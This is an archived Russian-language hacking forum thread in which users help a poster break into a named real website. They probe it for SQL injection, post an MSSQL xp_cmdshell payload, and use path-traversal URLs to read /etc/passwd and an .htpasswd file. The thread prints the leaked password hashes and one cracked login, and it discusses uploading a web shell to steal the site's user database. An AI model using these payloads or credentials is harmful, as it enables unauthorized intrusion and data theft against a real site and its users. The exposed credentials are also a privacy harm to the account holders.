Просмотр полной версии : sql inj
satana8920
25.12.2006, 23:04
вот линка _http://gibbon.kinnet.ru/theme.php?theme=2
у меня есть подозрения что там иньекция я много чего пробовал но ни в какую в чем дело помогите пожалста
Хм...теперь вопрос, с чего это у тебя такое подозрение возникло?
На все он отвечает...
An error occured.
Скули не вижу...по крайней мере пока...
satana8920
25.12.2006, 23:17
ээй люди хелп ми плиззззззз
Нету там инъекции. С чего ты взял, что есть?
satana8920
25.12.2006, 23:22
An error occured. вот ето почему пишет обьясните ламеру
satana8920
25.12.2006, 23:23
как мне на этот сервак залезть помогите кто нить кому делать нече репы дам
fucker"ok
25.12.2006, 23:28
Упз. Пропустил с первого раза.
http://gibbon.kinnet.ru/theme.php?theme='2'
http://gibbon.kinnet.ru/theme.php?theme=2
Вывод аналогичный, значит инъекция всё-таки есть.
An error occured. вот это почему пишет обьясните ламеру
учим английский.
An error occurred = произошла ошибка.
Теперь пораскинь мозгами и подумай, почему это пишет
guest3297
25.12.2006, 23:31
_http://gibbon.kinnet.ru/theme.php?theme=3-1
_http://gibbon.kinnet.ru/theme.php?theme=2
_http://gibbon.kinnet.ru/theme.php?theme=2--
имхо иньекция есть но вывода нету...
satana8920
25.12.2006, 23:32
а там ваще че нить есть помогите добры люди
satana8920
25.12.2006, 23:33
']
имхо иньекция есть но вывода нету...
и че в таком случае делать?
guest3297
25.12.2006, 23:39
ну вобще сюдя по этим 2 запросам
http://gibbon.kinnet.ru/theme.php?theme=2/*
http://gibbon.kinnet.ru/theme.php?theme=2--
там mssql но по всем банерам на портах там стоит nix а на nix мало кто ставит...
если mssql можно попробывать исполнить произольные команды если юзер sa что точно не так... ну и остаеться посимвольный перебор...
satana8920
25.12.2006, 23:42
даже могу точно сказать та линукс
а поизвольные команды это типа какие
guest3297
25.12.2006, 23:44
1';exec%20master..xp_cmdshell%20'dir%20c:\'--
satana8920
25.12.2006, 23:44
это типа чтоль скуль вслепую будет ??? :(
ну вобще сюдя по этим 2 запросам
http://gibbon.kinnet.ru/theme.php?theme=2/*
http://gibbon.kinnet.ru/theme.php?theme=2--
там mssql н
Комментирование -- есть и на мускуле ;)
satana8920
25.12.2006, 23:52
а как мона через эту хрень кондную строку открыть наприме или бд угнать
скорее всего БД никак не угнать. разве что попробовать посимвольный перебор какого-нить админского пасса , но это большой геморрой :)
satana8920
25.12.2006, 23:59
перебор пасов сам по себе оч большой геморой
че такой сервак непреступный что ль прямо _www.microsoft.com
satana8920
26.12.2006, 00:17
че ваще мне та забацать то мона ??
guest3297
26.12.2006, 00:24
Тебе подсказали.
Читай доки и разбирайся сам за тебя не кто делать нечего не будет.
Незнаю, но это кажеться поинтереснее
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=
guest3297
26.12.2006, 00:40
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../../../../../../../etc/passwd%00
Вот вот =)
Ну и если уж идти до конца
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../admin/.htpasswd%00
содержит
gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92
Ну и если уж идти до конца, то кто-то должен брутить пароли.
guest3297
26.12.2006, 16:26
[/quote]Ну и если уж идти до конца, то кто-то должен брутить пароли.[quote]
Слудующий пост будет
Ну и если уж идти до конца, то кто-то должен получить рута на хостинге....
мдя ребят совсем обнаглели.
satana8920
26.12.2006, 16:41
патци это как я понимаю пасы gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92
всем по +1
limpompo
26.12.2006, 17:41
login:locky
pass: underwat
guest3297
26.12.2006, 17:54
2satana8920
это хеши в DES
satana8920
26.12.2006, 22:45
да я уже понял что это хеши ща как нить расщифруем тока не знаю где джона взять под вынь
satana8920
limpompo за тебя уже все сделал.
login:locky
pass: underwat
Тебе одного не хватит?
Talisman
27.12.2006, 01:16
http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../index.php%00
хы )
http://webcam.kinnet.ru/
satana8920
27.12.2006, 01:23
satana8920
limpompo за тебя уже все сделал.
login:locky
pass: underwat
Тебе одного не хватит?
понимаешь в чем дело друг мой мне нужна ВСЯ бд юзарей на этом сервере вот я че и парюсь
Talisman
27.12.2006, 01:31
Warning: pg_exec() query failed: ERROR: Unterminated quoted string in /home/httpd/html/forum/forum.php3 on line 488
Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /home/httpd/html/forum/forum.php3 on line
из-за бажного поиска форума - абсолютный путь его.... инклудимс )
http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../httpd/html/forum/forum.php3%00
satana8920
27.12.2006, 01:36
так мне БД нужна куда мне админки
satana8920
27.12.2006, 01:40
ну мона впринципе на сервак че нить залить ибудет мне доступ ко всему через какой нить скрипт баговы
мона веть так чделать?
Talisman
27.12.2006, 01:47
так мне БД нужна куда мне админки
обижаешь! подумай хорошенько - чем больше зацепок, тем больше шанс.
и если ты знаеш, что тебе нужно и указываешь другим, что им не нужно делать, так может быть сам сделаешь?
satana8920
27.12.2006, 01:50
да ладно я молчу :Х
satana8920
27.12.2006, 01:53
из-за бажного поиска форума - абсолютный путь его.... инклудимс )
http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../httpd/html/forum/forum.php3%00
а смысл вот этого инклуда чего он нам дает то ??
Наверное фсетаки офтоп, но судя по новостям на _http://gibbon.kinnet.ru, уже даже найденные дырочки вскоре прикроют. Зря наверно подобранные пароли выложили..
Хотя конечно как показывает практика, (_4919.fatal.ru) админ может на сайт не заглядывать месяцами.
satana8920
27.12.2006, 02:11
да я видел уже что доложили !
МЛЯТЬ люди нахрена
а че реально что ль админы на сайте редко бывают
satana8920
27.12.2006, 16:46
дюди а мона мне шел как нить туда залить там ще php бажный напишите кто нить плиз
С помощью уже найденной уязвимость можно просматривать локальные файлы, соответственно есть маааленький шанс.
Что бы его реализовать, требуеться найти файл config'а сайта или форума, в котором прописаны пароль логин и сервер бд. А дальше, возможно пароль с логином подойдут к фтп, или доступ к бд может оказаться доступным со всех ипов, а не только с локальных.
Шансов на это мало, но они есть. Проблема в том, что неизвестна структура сайта/форума, и соответственно не известно даже названия файла с конфигами. (А мы можем просматривать исключительно файлы, с известным названием и местоположением.)
Я потыкался наобум, но конфигов не нашел.
И еще один способ - совсем левый, можно пробрутить логин/пас фтп.
Вобщем получить доступ можно, но моих возможностей на это не хватает..
Удачи, может у вас что получиться.
satana8920
30.12.2006, 23:20
да я уж прям теряюсь можт через бажный php шелл залить ?! киньте инфы кому не в лом _http://gibbon.kinnet.ru/gallerys/gallery.php?=
плиз
да я уж прям теряюсь можт через бажный php шелл залить ?! киньте инфы кому не в лом _http://gibbon.kinnet.ru/gallerys/gallery.php?=
плиз
Если так нужно могу дать шелл на gibbon.kinnet.ru
Правда я не понимаю зачем он нужен. :)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot